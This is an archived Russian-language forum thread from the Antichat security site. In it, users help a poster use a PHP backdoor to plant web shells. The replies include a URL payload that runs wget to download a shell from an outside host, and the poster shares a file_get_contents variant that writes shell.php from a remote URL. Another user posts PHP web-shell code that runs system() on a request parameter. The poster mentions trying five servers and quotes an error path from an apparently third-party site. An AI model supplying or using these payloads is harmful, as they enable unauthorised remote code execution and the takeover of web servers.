HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 25.07.2015, 09:11
skaska
Новичок
Регистрация: 04.05.2006
Сообщений: 1
Провел на форуме:
19432

Репутация: 0
По умолчанию

тестирую на своем сервере, на site.ru/ в файл, index.php (или в любой др файл читаемый в браузере) прописываю это бэкдор:

PHP код:
[COLOR="#000000"][CODE][COLOR="#0000BB"]
[/
COLOR][/CODE][/COLOR
не ругайте сильно - учусь... что мне нужно ввести в адресной строке, чтоб загрузить файл на сервер? вариант без использования куков, т е простой вариант есть? знаю, нужно исполнить команду: можно через eval,

типа site.ru/index.php?f=eval.......????

подскажите что ввести в адресной строке для загрузки файла на сервер именно для этого бэкдора, буду каждому благодарен!
 
Ответить с цитированием

  #2  
Старый 25.07.2015, 11:06
grimnir
Познавший АНТИЧАТ
Регистрация: 23.04.2012
Сообщений: 1,109
Провел на форуме:
216062

Репутация: 231


По умолчанию

.php?param1=eval&param2=wget http://site.com/wso.txt -O shell.php

как-то так,возможно вместо eval надо будет писать exec,system и т.д ,использовать кодирование,вместо wget curl
 
Ответить с цитированием

  #3  
Старый 25.07.2015, 12:19
b3
Постоянный
Регистрация: 05.12.2004
Сообщений: 647
Провел на форуме:
1698585

Репутация: 818


По умолчанию

Код можно очень сильно сократить
 
Ответить с цитированием

  #4  
Старый 25.07.2015, 12:21
skaska
Новичок
Регистрация: 04.05.2006
Сообщений: 1
Провел на форуме:
19432

Репутация: 0
По умолчанию

команда рабочая, спасибо... но работает не всегда, из 5 серверов на один загрузило удачно! на остальные выдает это

Код HTML:
Warning: array_filter() expects parameter 2 to be a valid callback, function 'eval' not found or invalid function name in /var/www/u2847619/data/www/adgstroy.ru/index.php on line 3
OK
иногда пишет ОК, по факту на серваке пусто.

права нужные (в загружаемой категории уже лежит рабочий шелл), вариации перебрал exec,system и вместо wget curl... в чем может быть загвоздка?
 
Ответить с цитированием

  #5  
Старый 25.07.2015, 12:24
skaska
Новичок
Регистрация: 04.05.2006
Сообщений: 1
Провел на форуме:
19432

Репутация: 0
По умолчанию

Цитата:
Сообщение от b3  

Код можно очень сильно сократить
да можно знаю, иногда получается с таким вариантом:

Код:
http://site.ru/cashe.php?cmd=$url = "http://ышеу2.ru/data/shell.txt";$content = file_get_contents($url);$h = fopen("shell.php","w");$text = "$content";fwrite($h,$text);fclose($h);
опять же в меньше половины случаев(
 
Ответить с цитированием

  #6  
Старый 25.07.2015, 12:30
b3
Постоянный
Регистрация: 05.12.2004
Сообщений: 647
Провел на форуме:
1698585

Репутация: 818


По умолчанию

Я имел другое ввиду, ваш код из первого поста можно сократить значительно, а использование eval прям в коде это паливо жестокое
 
Ответить с цитированием

  #7  
Старый 25.07.2015, 12:43
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

wget это системная функция, eval-то при чем?
 
Ответить с цитированием

  #8  
Старый 25.07.2015, 12:49
b3
Постоянный
Регистрация: 05.12.2004
Сообщений: 647
Провел на форуме:
1698585

Репутация: 818


По умолчанию

Цитата:
Сообщение от None  
Warning: array_filter() expects parameter 2 to be a valid callback, function 'eval' not found or invalid function name
Наверное потому что eval не явлется функцией, а там хз не буду утверждать 100%
 
Ответить с цитированием

  #9  
Старый 25.07.2015, 12:51
koro
Познающий
Регистрация: 16.07.2015
Сообщений: 30
Провел на форуме:
8796

Репутация: 0
По умолчанию

  • PHP код:
    [COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if(isset([/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'cmd'[/COLOR][COLOR="#007700"]])){
    [/
    COLOR][COLOR="#0000BB"]$cmd[/COLOR][COLOR="#007700"]= ([/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"cmd"[/COLOR][COLOR="#007700"]]);

    echo[/
    COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];
    [/
    COLOR][COLOR="#0000BB"]system[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$cmd[/COLOR][COLOR="#007700"]);
    echo[/
    COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];
    die;
    }[/
    COLOR][/COLOR
 
Ответить с цитированием

  #10  
Старый 25.07.2015, 12:57
b3
Постоянный
Регистрация: 05.12.2004
Сообщений: 647
Провел на форуме:
1698585

Репутация: 818


По умолчанию

еще один хакер... давайте глупости писать не будем может?
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.